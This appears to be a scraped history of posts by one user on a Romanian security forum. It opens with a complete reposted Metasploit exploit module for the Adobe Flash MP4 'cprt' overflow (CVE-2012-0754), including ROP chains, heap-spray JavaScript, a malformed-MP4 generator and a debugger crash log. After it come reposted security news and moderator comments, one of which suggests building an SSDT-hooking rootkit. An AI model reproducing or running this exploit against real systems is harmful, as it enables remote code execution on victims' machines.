Nytro

[h=1]Adobe Flash Player .mp4 'cprt' Overflow"[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 'cprt' Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear Situation.doc" e-mail attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0754' ], [ 'OSVDB', '79300'], [ 'BID', '52034' ], [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ] ], 'Payload' => { 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Flash Player 11.1.102.55 # Flash Player 10.3.183.10 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 15 2012", 'DefaultTarget' => 0)) end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def nop return make_nops(4).unpack("V").first end def get_payload(t) if t['Rop'].nil? code = "" else code = "\xbc\x0c\x0c\x0c\x0c" #Fix the stack to avoid a busted encoder end code << payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt rop = [ 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00000800, # <- change size to mark as executable if needed (-> ebx) 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end pivot = [0x77C1CAFB].pack('V*') #POP/POP/RET pivot << [junk].pack('V*') pivot << [t.ret].pack('V*') code = pivot + rop + code return code end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[5] #IE 7 on Windows Vista else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}") send_not_found(cli) return end print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}") # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...") mp4 = create_mp4(my_target) send_response(cli, mp4, {'Content-Type'=>'video/mp4'}) return end if request.uri =~ /\.swf$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...") send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) return end p = get_payload(my_target) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js_pivot = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); heap_obj.debug(true); for (var i=1; i < 0x1C2; i++) { heap_obj.alloc(block); } heap_obj.debug(true); JS js_pivot = heaplib(js_pivot, {:noobfu => true}) swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource swf_uri << "/Exploit.swf" print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}") html = %Q| <html> <head> <script> #{js_pivot} </script> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="test" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{swf_uri}" /> <embed src="#{swf_uri}" quality="high" width="1" height="1" name="test" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> | html = html.gsub(/^\t\t/, '') # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource # proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil print_status("#{cli.peerhost}:#{cli.peerport} Sending html...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def cleanup remove_resource('/test.mp4') rescue nil super end def exploit @swf = create_swf super end def create_swf path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close return swf end def create_mp4(target) mp4 = "" mp4 << "\x00\x00\x00\x18" mp4 << "ftypmp42" mp4 << "\x00\x00\x00\x00" mp4 << "mp42isom" mp4 << "\x00\x00\x00\x0D" mp4 << "cprt" mp4 << "\x00\xFF\xFF\xFF" mp4 << "\x00\x00\x00\x00" mp4 << "\x0c\x0c\x0c\x0c" * 2586 return mp4 end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx (510.9b4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000 eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx - Flash10x+0x48b65: 10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=???????? =end Sursa: Adobe Flash Player .mp4 'cprt' Overflow"

[h=2]Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits[/h]Tackhead writes "Hot on the hooves of Sergey Glazunov's hack 5-minutes into Pwn2Own, an image of an axe-wielding pink pony was the mark of success for a hacker with the handle of Pinkie Pie. Pinkie Pie subtly tweaked Chromium's sandbox design by chaining together three zero-day vulnerabilities, thereby widening his appeal to $60K in prize money, another shot at a job opportunity at the Googleplex, and instantly making Google's $1M Pwnium contest about 20% cooler. (Let the record show that Slashdot was six years ahead of this particular curve, and that April Fool's Day is less than a month away.)" Vedeti: Teen Exploits Three Zero-Day Vulns for $60K Win in Google Chrome Hack Contest | Threat Level | Wired.com Sursa: Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits - Slashdot

Daca sunt sysadmin, nu e problema mea sa pun filtre pentru "SeLeCt" sau "<script>" pentru ca nu e problema mea ca programatorul nu poate filtra asta. Da, un sysadmin bun is bate capul si isi pierde timpul cu asa ceva, dar nu este problema lui. Intr-adevar, sunt multe scripturi publice vulnerabile, dar tot nu vad ce legatura ar putea avea sysadmin-ul. Asta tine de Project Manager si de cati bani baga in proiect, daca nu baga, folosesc un script public si "bum", problema lor. Sysadminul trebuie sa fie atent la problemele lui, configurarea serverului: php.ini, permisiuni fisiere, sub ce utilizatori ruleaza procesele si tot asa. Dar de multe ori vin programatori cu request-uri ca "Vreau 9999 time limit", vreau "9999 max_file_upload" sau mai stiu eu ce, fara un motiv serios si de aici apar problemele. Din moment ce vulnerabila e aplicatia web, programatorul e de vina.

Nu ai fost luat peste picior, am inteles ideile, unele dau de gandit, altele nu sunt chiar atat de practice. Nu putem sterge conturile banate definitiv, pe baza lor putem stii daca membri actuali sunt printre noi (de exemplu cei care se ocupa cu carding, CC-uri... si care nu ne plac). Iar conturile vechi nu incurca pe nimeni, apar mereu persoane care nu mai activeaza de mult timp, sunt admini care nu mai activeaza de mult ci doar din cand in cand, stergerea acelor conturi ar fi penibila, nu putem forta pe cineva sa isi faca un alt cont pentru ca nu a intrat de mult timp. Cat despre curatenia forumului de posturi si topicuri inutile, se incearca tot ce se poate, in limita timpului disponibil. In fiecare zi se baneaza useri sau se muta topicuri la "Cosul de gunoi".

Sa securizezi partea de aplicatie web din server e stupid si inutil. Daca programatorul e prost, merita orice deface, e pacat ca sysadminii isi pierd timp sa repare problemele programatorilor...

Urmatorul...

Zise cineva care s-a inregistrat de o saptamana pe forum... - De ce sa stergem sau sa banam userii? Cu ce ar putea asta incanta pe cineva? - Cum putem sti toate conturile duplicat? Presupunem ca imi fac doua conturi: "Nytro" si "Vasile", de unde stie cineva ca e vorba de aceeasi persoana? - Sunt putine posturi care sunt doar o trimitere catre un link, majoritatea prezinta continutul, insa daca e vorba de programe sau video tutoriale, nu stiu cat de ok ar fi sa le gazduim pe serverul RST, insa e si asta o idee. Cat despre tutoriale incomplete... Nu te opreste nimeni sa scrii tu tutoriale complete, sau sa le completezi pe cele existente. - Da, posturile inutile sunt o problema, insa nu cred ca sta nimeni sa ia fiecare post nou, fiecare topic din fiecare categorie si sa vada tot ce se posteaza sa poata sa faca curatenie, dureaza mai mult decat iti imaginezi. - Pentru "noobs", adica restul forumului in afara de tine, exista categoriile CERERI si AJUTOR unde isi pot expune problema si pot primi ajutorul.

Bugtraq-I : Distribution for Pentesting and forensics Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize. Some of the special features that you can appreciate are: · Administrative improvements of the system for better management of services. · Expanded the range of recognition for injection wireless drivers. · Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit. · Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc... · Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.) · Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want. · It has incorporated the creation of the user in the installation, which is created with all system configurations. · We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user. Download Bugtraq-I Sursa: Bugtraq-I : Distribution for Pentesting and forensics | The Hacker News (THN)

#AntiSec hackers deface Panda Security site to protest LulzSec arrests Hackers aligned with ********* took credit on Wednesday for an attack on Panda Security's website shortly after charges were announced against five of the hacking collective's alleged members. Over 25 websites related to Panda Security have been hacked tonight by Antisec. Emails and md5 passwords have leaked to public. Panda was accused by ********* for helping the FBI to lurk ********* members. The attacks are believed to be in retaliation for the recent arrests made by the FBI. Yesterday biggest story of Hacking world exposed that, The world's most notorious computer hacker turned against his comrades because he did not want to go to prison and leave behind his two children. Monsegur, who has been described as the ringleader of LulzSec, and an 'influential member' of *********, pleaded guilty to a dozen hacking-related charges last summer - crimes which carry a maximum sentence of 124 years and six months in prison.But, rather than face a lengthy jail sentence and not see his two children, the unemployed father agreed to cooperate with the FBI, and, ever since his arrest, has reportedly been working with them to bring down the groups' top hackers. Charged Lulzsec Hackers are Ryan Ackroyd a.k.a. Kayla, lol, lolsoon Jake Davis a.k.a. topiary, atopiary Darren Martyn a.k.a. pwnsauce, raepsauce, networkkitten Donncha O'Cearrbhail a.k.a. palladium Hector Xavier Monsegur a.k.a. Sabu, Xavier DeLeon, Leon Jeremy Hammond a.k.a. Anarchaos, sup_g, burn, yohoho, POW, tylerknowsthis, crediblethreat IMAGINE: http://3.bp.blogspot.com/-FmNqd4qfqWA/T1cnIla9qhI/AAAAAAAAFI0/OSStHPEohOA/s1600/Lulzsec+hackers+arrested.png List of Defaced Sites : cybercrime.pandasecurity.com antivirus-offers.pandasecurity.com blog.cloudantivirus.com cloudofficeprotection.pandasecurity.com cloud.pandasecurity.com cloudpartnercenter.pandasecurity.com cloudprotectionbeta.pandasecurity.com.tar.gz cloudprotection.pandasecurity.com facebookfriends.pandasecurity.com forgetsecurity.co.uk forgetsecurity.co.za forgetsecurity.es go.pandasecurity.com info.pandasecurity.com information.pandasecurity.com lavuelta.pandasecurity.com maintenance.pandasecurity.com momentos.pandasecurity.com ondersteuning.pandasecurity.com pandacompetition.pandasecurity.com pandalabs.pandasecurity.com prensa.pandasecurity.com press.pandasecurity.com promo.pandasecurity.com protectyourfamily.pandasecurity.com research.pandasecurity.com securitytothecloud.pandasecurity.com serviciospro.pandasecurity.com servicos.pandasecurity.com suporte.pandasecurity.com techcenter.pandasecurity.com uninstall.cloudantivirus.com wiki.cloudantivirus.com Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy "Pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has earning money working with Law Enforcement to lurk and snitch on ********* activists. they helped to jail 25 ********* in different countries...yep we know about you. How does it feel to be the spied one?" In August, 2011, it came to light that ********* had hacked into 70 law enforcement websites, mostly local sheriffs’ websites in Missouri.The hacks had occurred four weeks before they were discovered. Using information passed on by Monsegur, the FBI was able to work with the server company to mitigate the damage. The FBI then alerted 300 government, financial and corporate entities around the world to potential vulnerabilities in their computer systems. AntiSec also voiced support for those fighting for their freedom in Tunisia, Egypt, Libya, Syria, Bahrain, Yemen, and Iran.It also sent a dare to the FBI to get its members, saying, "we are waiting for you." Sursa: #AntiSec hackers deface Panda Security site to protest LulzSec arrests | The Hacker News (THN) PS: Am postat asta doar ca sa vedeti fetele alora

Sefu, spune cu ce te-a tepuit si nu mai comenta de-am-pulea.

Puneti accent pe partea de aplicatII web. Oricum o sa mai discutam. Cat despre meeting, a fost super, felicitari pentru tot.

Atatia? 60.000 de dolari ti se pare mult? Nu da 1 milion pentru asta, da MAXIM 60.000 $. Cititi si voi tot...

[h=2]Chrome Hacked In 5 Minutes At Pwn2Own[/h]"After offering a total prize fund of up to $1M for a successful Chrome hack, it seems Google got what it wanted (or not!). No more than 5 minutes into the Pwn2Own cracking contest team Vupen exploited 2 Chrome bugs to demonstrate a total break of Google's browser. They will win at least 60k USD out of Google's prize fund, as well as taking a strong option on winning the overall Pwn2Own prize. It also illustrates that Chrome's much lauded sandboxing is not a silver bullet for browser security." Sursa: Chrome Hacked In 5 Minutes At Pwn2Own - Slashdot

[h=1]The Mystery of the Duqu Framework[/h] Igor Soumenkov Kaspersky Lab Expert Posted March 07, 15:58 GMT While analyzing the components of Duqu, we discovered an interesting anomaly in the main component that is responsible for its business logics, the Payload DLL. We would like to share our findings and ask for help identifying the code. [h=2]Code layout[/h] At first glance, the Payload DLL looks like a regular Windows PE DLL file compiled with Microsoft Visual Studio 2008 (linker version 9.0). The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++. This function is called from the PNF DLL and it is actually the “main” function that implements all the logics of contacting C&C servers, receiving additional payload modules and executing them. The most interesting is how this logic was programmed and what tools were used. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of “slices” of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions and user-written code, except the biggest slice that contains most of C&C interaction code. Layout of the code section of the Payload DLL file This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. We call it the Duqu Framework. [h=2]The Framework[/h] [h=3]Features[/h] The code that implements the Duqu Framework has several distinctive properties: Everything is wrapped into objects Function table is placed directly into the class instance and can be modified after construction There is no distinction between utility classes (linked lists, hashes) and user-written code Objects communicate using method calls, deferred execution queues and event-driven callbacks There are no references to run-time library functions, native Windows API is used instead [h=3]Objects[/h] All objects are instances of some class, we identified 60 classes. Each object is constructed with a “constructor” function that allocates memory, fills in the function table and initializes members. Constructor function for the linked list class. The layout of each object depends on its class. Some classes appear to have binary compatible function tables but there is no indication that they have any common parent classes (like in other OO languages). Furthermore, the location of the function table is not fixed: some classes have it at offset 0 of the instance, but some does not. Layout of the linked list object. First 10 fields are pointers to member functions. Objects are destroyed by corresponding “destructor” functions. These functions usually destroy all objects referenced by member fields and free any memory used. Member functions can be referenced by the object’s function table (like “virtual” functions in C++) or they can be called directly. In most object-oriented languages, member functions receive the “this” parameter that references the instance of the object, and there is a calling convention that defines the location of the parameter – either in a register, or in stack. This is not the case for the Duqu Framework classes – they can receive “this” parameter in any register or in stack. Member function of the linked list, receives “this” parameter on stack [h=3]Event driven framework[/h] The layout and implementation of objects in the Duqu Framework is definitely not native to C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model: Event objects, based on native Windows API handles Thread context objects that hold lists of events and deferred execution queues Callback objects that are linked to events Event monitors, created by each thread context for monitoring events and executing callback objects Thread context storage manages the list of active threads and provides access to per-thread context objects This event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like compiled with known Objective C compilers. Event-driven model of the Duqu Framework Every thread context object can start a “main loop” that looks for and processes new items in the lists. Most of the Duqu code follow the same principle: create an object, bind several callbacks to internal or external events and return. Callback handlers are then executed by the event monitor object that is created within each thread context. Here is an example pseudocode for a socket object: SocketObjectConstructor { NativeSocket = socket(); SocketEvent = new MonitoredEvent(NativeSocket); SocketObjectCallback = new ObjectCallback(this, SocketEvent, OnCallbackFunc); connect(NativeSocket, ...); } OnCallbackFunc { switch(GetType(Event)) { case Connected: ... case ReadData: ... ...} } [h=2]Conclusions[/h] The Duqu Framework appears to have been written in an unknown programming language. Unlike the rest of the Duqu body, it's not C++ and it's not compiled with Microsoft's Visual C++ 2008. The highly event driven architecture points to code which was designed to be used in pretty much any kind of conditions, including asynchronous commutations. Given the size of the Duqu project, it is possible that another team was responsible for the framework than the team which created the drivers and wrote the system infection and exploits. The mysterious programming language is definitively NOT C++, Objective C, Java, Python, Ada, Lua and many other languages we have checked. Compared to Stuxnet (entirely written in MSVC++), this is one of the defining particularities of the Duqu framework. [h=2]The Duqu Framework: What was that?[/h] After having performed countless hours of analysis, we are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language. We would like to make an appeal to the programming community and ask anyone who recognizes the framework, toolkit or the programming language that can generate similar code constructions, to contact us or drop us a comment in this blogpost. We are confident that with your help we can solve this deep mystery in the Duqu story. Sursa: The Mystery of the Duqu Framework - Securelist

Mai citeste o data...

Ce penala e faza: C:\Windows>ping www.facebook.com Ping request could not find host www.facebook.com. Please check the name and try again. C:\Windows>ping facebook.com Pinging facebook.com [69.171.224.11] with 32 bytes of data: Reply from 69.171.224.11: bytes=32 time=181ms TTL=244 Reply from 69.171.224.11: bytes=32 time=181ms TTL=244 Ping statistics for 69.171.224.11: Packets: Sent = 2, Received = 2, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 181ms, Maximum = 181ms, Average = 181ms Control-C ^C C:\Windows> DNS... Nu mai vorbiti de DDOS daca nu cunoasteti sistemul DNS macar... PS: "Pentru serverul RST" pare ca merge Facebook-ul

PHP e un embedded in HTML. Mai exact ai asa: <html> <?php echo 'aaa'; ?> </html> Acest cod trece prin interpretorul PHP. Ce NU e cod PHP, adica ce nu e intre <?php si ?> e direct returnat catre browser, ce e intre, e interpretat. Cu formularele e aceeasi idee, se trimit date prin POST si se face ceva cu ele. Citeste si tu putin despre HTML, HTTP si PHP.

ERR_NAME_RESOLUTION_FAILED DNS aka Domain Name System.

E clar, se umple tara de lulji dinastia...

Pai in numele cacatului, posteaza acolo o exploatare manuala, nu un cacat de link. Si nu vad ce relevanta are Linux-ul, dar nu mai conteaza.

Ai ban daca mai postezi porcaria asta. Ori postezi SQL Injection, ari te abtii, oricine poate posta un link catre un site, indiferent ca e vulnerabil sau nu, problema e exploatarea acelei vulnerabilitati. Tu ce faci cu el, il bagi in Havij?

Ai postat corect, dar ai postat o porcarie. Nu vad niciun SQL Injection, vad doar un link. Ce faci cu el, il bagi in Havij?

Ai pus un link, si un link cu ghilimea. Nu ai facut nimic. Se muta la gunoi.

Ban.

Kernel-mode hook pe CreateRemoteThread(Ex), adica rootkit. Poti face un driver care suprascrie SSDT-ul, gasesti acolo NtCreateRemoteThread. PS: Abtineti-va de la replici inutile.